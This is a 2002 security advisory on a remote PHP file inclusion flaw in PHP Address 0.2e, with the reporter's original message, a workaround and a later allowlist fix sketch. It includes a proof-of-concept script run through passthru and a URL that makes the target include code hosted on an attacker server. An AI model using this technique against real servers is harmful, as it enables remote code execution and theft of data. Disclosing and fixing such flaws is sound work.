SecurityTracker.com
Category:   Application (Generic)  >   PHP Address
Vendors:   Huebsch, Chris
PHP Address Allows Remote Users to Execute Arbitrary PHP Code on the Server.
SecurityTracker Alert ID:  1004560
SecurityTracker URL:  http://securitytracker.com/id/1004560
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  Jun 17 2002
Impact:   Execution of arbitrary code via network, User access via network
Exploit Included:  Yes  
Version(s): 0.2e
Description:   A vulnerability was reported in the PHP Address script collection. A remote user can execute arbitrary PHP code on the server.

The flaw reportedly resides in the 'global.php3' script, where no default value is set for the '$LangCookie' variable. A remote user can therefore create a malicious PHP file, post it to another server, and then specify that file for inclusion using the '$LangCookie' variable with the following type of URL:

"http://SERVER/globals.php3?LangCookie=INCLUDE_FILE"

A demonstration exploit script is provided:

------------x.php3------------
<?
passthru("/bin/ls /");
?>
-------------------------------

With this 'x.php3' exploit script posted to 'MYSERVER', the remote user can cause x.php3 to be executed on the target 'SERVER' with the following URL:

http://SERVER/globals.php3?LangCookie=http://MYSERVER/x

Impact:   A remote user can execute arbitrary PHP code on the server.
Solution:   No solution was available at the time of this entry.

The author of the report has provided the following workaround:

In the 'global.php3' file, add the line '$LangCookie = "";' as shown below:

<?php
# (c) Copyright in 2000, 2001 by Chris Huebsch (chu@informatik.tu-chemnitz.de)
$LangCookie = ""; // ADD THIS LINE
if ($LangCookie)
  require("$LangCookie.php3"); // Line 5
...
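
The workaround above disables the language include entirely. As an added example (not part of the original advisory, not PHP Address code, and not the vendor's fix), the following sketch keeps language selection working by comparing the client-supplied value against an allowlist, so the value never reaches require(). The language codes, the lang/ directory, the function name, and reading the value from a cookie are assumptions made for illustration.

```php
<?php
// Added example, not PHP Address code. The language codes, the lang/
// directory and the function name are hypothetical.

const ALLOWED_LANGS = ['en', 'de', 'fr'];   // assumed set of shipped language files
const DEFAULT_LANG  = 'en';

/**
 * Map a client-supplied language value to a local file path.
 * The value is only compared against the allowlist; it is never
 * concatenated into the path, so a URL cannot reach require().
 */
function language_file(array $cookies, string $langDir): string
{
    $requested = $cookies['LangCookie'] ?? DEFAULT_LANG;
    // Strict comparison also rejects arrays and other non-string values.
    $lang = in_array($requested, ALLOWED_LANGS, true) ? $requested : DEFAULT_LANG;
    return $langDir . '/' . $lang . '.php3';
}

// Constructed inputs: the value from the advisory's URL, an unknown
// code, an array value, a legitimate choice, and no cookie at all.
$samples = [
    ['LangCookie' => 'http://MYSERVER/x'],
    ['LangCookie' => 'xx'],
    ['LangCookie' => ['de']],
    ['LangCookie' => 'de'],
    [],
];
foreach ($samples as $cookies) {
    printf(
        "%-36s => %s\n",
        json_encode($cookies, JSON_UNESCAPED_SLASHES),
        language_file($cookies, __DIR__ . '/lang')
    );
}

// In the application the value would be read explicitly rather than
// through register_globals:
//   require language_file($_COOKIE, __DIR__ . '/lang');
```

On PHP versions of the advisory's era, setting allow_url_fopen = Off in php.ini also stops require() from fetching http:// URLs; PHP 5.2 and later have a separate allow_url_include directive, which is off by default.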

Vendor URL:  phpaddress.huebsch-gemacht.de/
Cause:   Configuration error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Underlying OS Comments:  PHP-based

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Vendor Issues Fix) Re: PHP Address Allows Remote Users to Execute Arbitrary PHP Code on the Server.
The vendor issued a fix.



 Source Message Contents

Subject:  PHP source injection in PHPAddress


PHP source injection in PHPAddress

Description

PHP-Address is a collection of PHP3-Scripts (works on PHP4 too)
for maintaining a small web-based address-database. It can be found
at http://phpaddress.huebsch-gemacht.de/

Workaround

Change the global.php3 file so it looks like this:
<?php
# (c) Copyright in 2000, 2001 by Chris Huebsch (chu@informatik.tu-chemnitz.de)
$LangCookie = "";      // THIS LINE
if ($LangCookie)
  require("$LangCookie.php3");  // Line 5
...

Tested version

PHP Address 0.2e (09.12.2001)

The Problem

Any user who requests an url like
"http://SERVER/globals.php3?LangCookie=INCLUDE_FILE" is
able to include any file he wants.

Example

I put a PHP script on my server which I wanted to include:

------------x.php3------------
<?
    passthru("/bin/ls /");
?>
-------------------------------

Then I requested this URL:
http://SERVER/globals.php3?LangCookie=http://MYSERVER/x
(the .php3 is already there; look at line 5 in global.php3)

------------output------------
bin boot dev etc home initrd lib lost+found mnt opt proc root sbin swap tmp
usr var
------------------------------

Note that any PHP code could be included, malicious users could get access
to database passwords, personal information, ...

------------------------------
Tim Vandermeersch
Tim.Vandermeersch@pandora.be



 
 



Copyright 2021, SecurityGlobal.net LLC